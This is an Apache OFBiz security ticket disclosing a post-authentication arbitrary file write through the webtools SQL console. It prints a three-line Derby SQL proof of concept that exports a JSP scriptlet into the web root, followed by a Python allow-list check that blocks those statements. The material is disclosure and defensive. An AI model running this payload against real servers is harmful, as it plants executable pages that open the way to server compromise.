OFBiz / OFBIZ-1525 Issue to group security concerns / OFBIZ-12057

Prevent arbitrary file write using webtools/control/EntitySQLProcessor.


    Details

    • Sprint:
      Bug Crush Event - 21/2/2015

      Description

      Shuibo Ye <shuiboye@gmail.com> reported a possible arbitrary file write using webtools/control/EntitySQLProcessor.

      In the "SQL Command" part, I create a table and insert some strings and export the table to a file one sentence at a time.
      PoC:
          CREATE TABLE "test" (string VARCHAR(80))
          INSERT INTO "test" (string) VALUES ('<%= system.getProperty("user.dir") %>')
          call SYSCS_UTIL.SYSCS_EXPORT_TABLE(null,'test','.\framework\webtools\webapp\webtools\default.jsp',null,'*',null)

      After executing the three sentences, I successfully write the file and its URL is https://localhost:8443/webtools/default.jsp.

      Note: this is a post-auth vulnerability, so we did not create a CVE.
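The PoC works because the SQL processor hands the submitted text straight to Derby, whose SYSCS_UTIL procedures can write files on the server; a file dropped inside the webapp tree is then served as a JSP. The following is an added example, not OFBiz code and not the fix that was committed for this ticket: an allow-list gate that a "run this SQL" admin tool could apply before executing anything, shown rejecting each of the three PoC statements. It assumes the tool only needs read-only queries (Derby's SELECT and VALUES forms).

```python
import re

# Added example, not part of OFBiz. Gate for a read-only SQL console in front
# of Apache Derby: only a single SELECT/VALUES query may pass; DDL, DML and
# any SYSCS_UTIL.* system procedure (the file import/export family the PoC
# abuses) are refused before the text reaches the database.
_BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)
_LINE_COMMENT = re.compile(r"--[^\n]*")
_STRING = re.compile(r"'(?:[^']|'')*'")          # SQL literal, '' escapes a quote
_SYSCS = re.compile(r"\bSYSCS_UTIL\s*\.\s*SYSCS_\w+", re.I)
_READ_ONLY_VERBS = ("SELECT", "VALUES")          # Derby's query-only statement forms


def _normalize(sql: str) -> str:
    """Drop comments and blank out string literals so keywords cannot hide in
    them (a mis-parse here can only produce a false deny, never a false allow)."""
    sql = _BLOCK_COMMENT.sub(" ", sql)
    sql = _LINE_COMMENT.sub(" ", sql)
    sql = _STRING.sub("''", sql)
    return sql.strip().rstrip(";").strip()


def check_sql(sql: str) -> str:
    """Return 'allow' for one read-only query, otherwise 'deny: <reason>'."""
    body = _normalize(sql)
    if not body:
        return "deny: empty statement"
    if ";" in body:                              # no batching CREATE / INSERT / CALL
        return "deny: multiple statements"
    hit = _SYSCS.search(body)
    if hit:
        return f"deny: Derby system procedure {hit.group(0).upper()}"
    verb = re.match(r"[A-Za-z_]+", body)
    verb = verb.group(0).upper() if verb else "?"
    if verb not in _READ_ONLY_VERBS:
        return f"deny: {verb} is not a read-only query"
    return "allow"


def check_batch(statements):
    """Classify each submitted statement independently."""
    return [check_sql(s) for s in statements]


# Constructed input: the three statements from the ticket's PoC.
POC = [
    'CREATE TABLE "test" (string VARCHAR(80))',
    """INSERT INTO "test" (string) VALUES ('<%= system.getProperty("user.dir") %>')""",
    r"call SYSCS_UTIL.SYSCS_EXPORT_TABLE(null,'test','.\framework\webtools\webapp\webtools\default.jsp',null,'*',null)",
]

if __name__ == "__main__":
    for stmt, verdict in zip(POC, check_batch(POC)):
        print(f"{verdict:60} <- {stmt[:40]}")
```

Keyword filtering is only the first layer: the database account should not be able to write into the webapp directory at all, and the console's access should be restricted to the few administrators who need it.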

            People

            • Assignee: Jacques Le Roux (jleroux)
            • Reporter: Jacques Le Roux (jleroux)